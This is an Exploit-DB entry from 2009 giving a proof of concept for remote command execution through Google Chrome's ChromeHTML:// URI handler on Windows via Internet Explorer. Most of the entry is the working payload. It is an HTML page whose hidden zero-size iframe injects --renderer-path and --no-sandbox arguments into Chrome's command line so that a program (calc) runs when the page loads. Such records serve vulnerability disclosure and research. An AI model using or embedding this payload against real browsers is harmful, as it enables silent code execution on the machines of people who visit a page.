Google Chrome ChromeHTML:// Parameter Injection PoC

ID EDB-ID:7935
Type exploitdb
Reporter waraxe
Modified 2009-01-30T00:00:00


Google Chrome (ChromeHTML://) Parameter Injection PoC. Remote exploit for windows platform

                                            Try this:


Disabling sandbox does matter  :) 
Tested with Google Chrome Chrome on Win XP/Vista and IE6/IE7 and it works ...

Full PoC:

<html><head><title>Chrome URI Handler Remote Command Execution PoC</title></head>
<h3>This is a test</h3>
<iframe src='chromehtml:"%20--renderer-path="calc"%20--no-sandbox' width=0 height=0></iframe>

# [2009-01-30]